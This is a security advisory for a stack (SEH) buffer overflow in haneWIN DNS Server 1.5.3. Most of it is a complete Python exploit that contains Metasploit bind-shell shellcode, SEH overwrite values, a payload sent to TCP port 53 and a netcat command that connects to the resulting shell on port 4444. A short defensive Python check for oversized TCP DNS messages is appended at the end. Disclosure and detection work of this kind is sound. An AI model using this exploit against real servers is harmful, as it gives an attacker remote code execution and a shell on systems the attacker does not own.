haneWIN DNS Server Buffer Overflow Vulnerability

Published: 2014-01-29
Updated: 2014-02-19

Affected systems:
hanewin haneWIN DNS Server 1.5.3

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 65287

haneWIN DNS Server is a DNS server for the Windows platform. haneWIN DNS Server 1.5.3 and other versions contain an SEH overflow when handling a large amount of data; an attacker can exploit this vulnerability to execute arbitrary code in the context of the application.

<*Source: Dario Estrada
  *>

Test method:
--------------------------------------------------------------------------------
Warning: the following program (method) may be offensive in nature and is intended solely for security research and teaching. Use at your own risk!

#!/usr/bin/python

# Exploit Title: haneWIN DNS Server (SEH)
# Author: Dario Estrada (dash) https://intrusionlabs.org
# Date: 2014-01-29
# Version: haneWIN DNS Server 1.5.3
# Vendor Homepage: http://www.hanewin.net/
# Vulnerable app link:http://www.hanewin.net/dns-e.htm
# Tested on: Windows XP SP3
# Thanks to God, to my family and all my friends for always being there
#
# Description:
# A SEH overflow occurs when large amount of data is sent to the server
#
import socket, sys, os, time

usage = "   Usage: " + sys.argv[0] + " <host> "

if len(sys.argv) < 2:
    print usage
    sys.exit(0)

host = sys.argv[1]

shellcode = (
# msfpayload windows/shell_bind_tcp R | msfencode -t c -b "\x00\xff\x0a\x0d"
"\xb8\xdf\x64\x04\x29\xd9\xc7\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x56\x31\x45\x13\x83\xed\xfc\x03\x45\xd0\x86\xf1\xd5\x06\xcf"
"\xfa\x25\xd6\xb0\x73\xc0\xe7\xe2\xe0\x80\x55\x33\x62\xc4\x55"
"\xb8\x26\xfd\xee\xcc\xee\xf2\x47\x7a\xc9\x3d\x58\x4a\xd5\x92"
"\x9a\xcc\xa9\xe8\xce\x2e\x93\x22\x03\x2e\xd4\x5f\xeb\x62\x8d"
"\x14\x59\x93\xba\x69\x61\x92\x6c\xe6\xd9\xec\x09\x39\xad\x46"
"\x13\x6a\x1d\xdc\x5b\x92\x16\xba\x7b\xa3\xfb\xd8\x40\xea\x70"
"\x2a\x32\xed\x50\x62\xbb\xdf\x9c\x29\x82\xef\x11\x33\xc2\xc8"
"\xc9\x46\x38\x2b\x74\x51\xfb\x51\xa2\xd4\x1e\xf1\x21\x4e\xfb"
"\x03\xe6\x09\x88\x08\x43\x5d\xd6\x0c\x52\xb2\x6c\x28\xdf\x35"
"\xa3\xb8\x9b\x11\x67\xe0\x78\x3b\x3e\x4c\x2f\x44\x20\x28\x90"
"\xe0\x2a\xdb\xc5\x93\x70\xb4\x2a\xae\x8a\x44\x24\xb9\xf9\x76"
"\xeb\x11\x96\x3a\x64\xbc\x61\x3c\x5f\x78\xfd\xc3\x5f\x79\xd7"
"\x07\x0b\x29\x4f\xa1\x33\xa2\x8f\x4e\xe6\x65\xc0\xe0\x58\xc6"
"\xb0\x40\x08\xae\xda\x4e\x77\xce\xe4\x84\x0e\xc8\x2a\xfc\x43"
"\xbf\x4e\x02\x72\x63\xc6\xe4\x1e\x8b\x8e\xbf\xb6\x69\xf5\x77"
"\x21\x91\xdf\x2b\xfa\x05\x57\x22\x3c\x29\x68\x60\x6f\x86\xc0"
"\xe3\xfb\xc4\xd4\x12\xfc\xc0\x7c\x5c\xc5\x83\xf7\x30\x84\x32"
"\x07\x19\x7e\xd6\x9a\xc6\x7e\x91\x86\x50\x29\xf6\x79\xa9\xbf"
"\xea\x20\x03\xdd\xf6\xb5\x6c\x65\x2d\x06\x72\x64\xa0\x32\x50"
"\x76\x7c\xba\xdc\x22\xd0\xed\x8a\x9c\x96\x47\x7d\x76\x41\x3b"
"\xd7\x1e\x14\x77\xe8\x58\x19\x52\x9e\x84\xa8\x0b\xe7\xbb\x05"
"\xdc\xef\xc4\x7b\x7c\x0f\x1f\x38\x8c\x5a\x3d\x69\x05\x03\xd4"
"\x2b\x48\xb4\x03\x6f\x75\x37\xa1\x10\x82\x27\xc0\x15\xce\xef"
"\x39\x64\x5f\x9a\x3d\xdb\x60\x8f"
)

nSEH = "\xeb\x06\x90\x90"
SEH = "\xd1\x07\xfc\x7f"
opcode = "\xe9\xdf\xf6\xff\xff"
junk = "A" * (2324 - len(shellcode))
padding = "A" * 600
buff = shellcode + junk + nSEH + SEH + opcode + padding

print "[+] Connecting to %s:53" % (host)
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, 53))
    aix = shellcode + "A" * (2324 - len(shellcode))
    print "[*] Sending payload.." + " shellcode: " + str(len(shellcode))
    s.send(buff)
    print "[*] Exploit Sent Successfully!"
    s.close()
    print "[+] Waiting for 5 sec before spawning shell to " + host + ":4444 "
    time.sleep(5)
    os.system ("nc -n " + host + " 4444")
except:
    print "[!] Could not connect to " + host + ":53 "
    sys.exit(0)

Recommendations:
--------------------------------------------------------------------------------
Vendor patch: hanewin
-------
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's home page for the latest version: http://www.hanewin.net/dns-e.htm
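Added example, not part of the advisory and not the vendor's or the exploit author's code: a defender-side check for the traffic pattern the advisory describes. DNS over TCP (RFC 1035, section 4.2.2) prefixes each message with a two-byte length, so a multi-kilobyte unstructured payload on TCP/53 either fails framing outright or declares a message far larger than any normal query. The 512-byte threshold, the function names and the three sample payloads are assumptions constructed for this example.

```python
import struct

# DNS over TCP prefixes every message with a two-byte big-endian length.
# A query is normally a few dozen bytes; the advisory's crash condition is a
# multi-kilobyte unstructured payload on TCP/53.
MAX_EXPECTED_QUERY_LEN = 512   # assumed threshold chosen for this example
HEADER_LEN = 12                # fixed DNS header size
MAX_LABEL_LEN = 63             # RFC 1035 label length limit


def build_tcp_query(qname, qtype=1, txid=0x1234):
    """Constructed sample input: a minimal well-formed query, TCP-framed."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1, QDCOUNT=1
    question = b""
    for label in qname.rstrip(".").split("."):
        question += bytes([len(label)]) + label.encode("ascii")
    question += b"\x00" + struct.pack(">HH", qtype, 1)          # QTYPE, QCLASS=IN
    message = header + question
    return struct.pack(">H", len(message)) + message


def walk_qname(body, offset):
    """Walk one uncompressed name; return the offset after it, or None if invalid."""
    while True:
        if offset >= len(body):
            return None
        length = body[offset]
        offset += 1
        if length == 0:
            return offset
        if length > MAX_LABEL_LEN or offset + length > len(body):
            return None
        offset += length


def inspect_tcp_dns(payload):
    """Classify a raw TCP payload sent to port 53 as ok, suspicious or malformed."""
    if len(payload) < 2:
        return ("malformed", "missing length prefix")
    (declared,) = struct.unpack(">H", payload[:2])
    body = payload[2:]
    if declared != len(body):
        return ("malformed", "length prefix %d != body length %d" % (declared, len(body)))
    if declared < HEADER_LEN:
        return ("malformed", "shorter than the 12-byte DNS header")
    if declared > MAX_EXPECTED_QUERY_LEN:
        return ("suspicious", "oversized message of %d bytes" % declared)
    qdcount = struct.unpack(">H", body[4:6])[0]
    if qdcount != 1:
        return ("suspicious", "unexpected QDCOUNT %d" % qdcount)
    end = walk_qname(body, HEADER_LEN)
    if end is None or end + 4 > len(body):
        return ("malformed", "question section does not parse")
    return ("ok", "well-formed query")


# Constructed samples for this example, not captured traffic.
SAMPLES = {
    "normal": build_tcp_query("example.com"),
    "unframed_junk": b"A" * 3000,                          # no valid length prefix
    "framed_junk": struct.pack(">H", 3000) + b"A" * 3000,  # framed but oversized
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, inspect_tcp_dns(data))
```

Run as-is to classify the three constructed samples. In practice the function would be fed the reassembled TCP payload from a capture or from a proxy placed in front of the server, and anything other than `ok` logged or dropped before it reaches an unpatched haneWIN instance.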